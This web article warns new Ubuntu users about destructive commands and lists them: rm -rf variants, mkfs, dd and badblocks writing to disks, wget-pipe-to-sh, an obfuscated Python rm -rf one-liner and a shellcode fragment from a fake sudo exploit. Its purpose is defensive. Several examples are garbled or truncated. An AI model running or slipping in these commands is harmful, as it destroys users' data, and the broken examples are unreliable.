Malicious Commands You Should NOT Run on Linux

The following commands can cause massive damage to your Ubuntu operating system! Please DO NOT execute any of them, just read and learn!


sudo rm -rf /
sudo rm -rf .
sudo rm -rf *
rm -rf * or rm -rf *.*
rm -rf ~/ &

All the below commands will erase your hard drive!


sudo mkfs
sudo mkfs.ext2
sudo mkfs.ext3
sudo mkfs.ext4
sudo mkfs.bfs
sudo mkfs.cramfs
sudo mkfs.minix
sudo mkfs.msdos
sudo mkfs.reiserfs
sudo mkfs.vfat

The dd command can be very dangerous, especially when you have no idea what it does! Below are some examples, but remember that these can vary often!


sudo dd if=/dev/zero of=/dev/hda
sudo dd if=/dev/hda of=/dev/hdb
sudo dd if=something of=/dev/hda

WARNING: /dev/hda and /dev/hdb from the above example can be replaced with /dev/sda or /dev/sdb or any partition or hard drive you may have on your system!

Block device manipulation: Causes raw data to be written to a block device. Often times this will clobber the filesystem and cause total loss of data!


any_command > /dev/sda
dd if=something of=/dev/sda

Forkbomb : It is a malicious script that will execute a huge number of processes until your system freezes, forcing you to do a hard reboot which may cause data corruption or data damage.

The below command looks really intriguing and curiosity may lead new and inexperienced users to execute it! DON’T EXECUTE THEM!




fork while fork

Tarbomb: Let’s say that someone who wants to help you, offers you a tar.gz or tar.bz2 archive and he asks you to extract it into an existing directory. This archive can be crafted to explode into a million of files, or inject other existing files into the system by guessing their filenames. You should make the habit of decompressing tar.gz or tar.bz2 archives inside a newly created directory!

Decompression bomb: Here’s another example. Let’s say someone asks you to extract an archive which appears to be a small download. In reality it’s highly compressed data and will inflate to hundreds of Gigabites, filling your hard drive until it freezes! You should not touch data from an untrusted source!

Shellscript: This one is also very dangrous! Someone gives you a link to download, to a shellscript and then he asks you to execute it. This script can contain any command he chooses (from the above examples). Do not execute code from people you don’t trust! Here are some examples:


wget http://some_place/some_file
sh ./some_file

Example :

sh ./malicious-script



wget http://some_place/some_file -O- | sh

Example :

wget -O- | sh

WARNING: Remember that the above examples can have any name!

Compiling code: A person gives you the source code to an application and tells you to compile it. It is easy to hide malicious code as a part of a large wad of source code, and source code gives the attacker a lot more creativity for disguising malicious payloads. Therefore, Do not compile or execute the compiled code unless the source is of some well-known application, obtained from a reputable site (i.e. Softpedia, SourceForge, Freshmeat, the author’s homepage, an Ubuntu address).

A famous example of this surfaced on a mailing list disguised as a proof of concept sudo exploit claiming that if you run it, sudo grants you root without a shell. There was this payload:


char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "xebx3ex5bx31xc0x50x54x5ax83xecx64x68"
"cp -p /bin/sh /tmp/.beyond; chmod 4755

To the new and inexperienced computer user, this looks like the “hex code gibberish stuff” that is so typical of a safe proof-of-concept. However, this actually runs rm -rf ~ / & which will destroy your home directory as a regular user, or all files as root.

Here’s another example of code that should definitely NOT be executed by anyone!


python -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))'

Where “sn!.sg!+” is simply rm -rf * shifted a character up.

In conclusion, all new and inexperienced users who want to learn Ubuntu should start learning the above commands first and what they can do to your system.

mv /home/yourhomedirectory/* /dev/null

This command will move all the files inside your home directory to a place that doesn’t exist; hence you will never ever see those files again.


badblocks -vfw /dev/fd0 10000 ; reboot

Replace /dev/fd0 with the device name of your boot drive and this DESTRUCTIVE command will render your drive unbootable.

Be the first to comment

Leave a Reply

Your email address will not be published.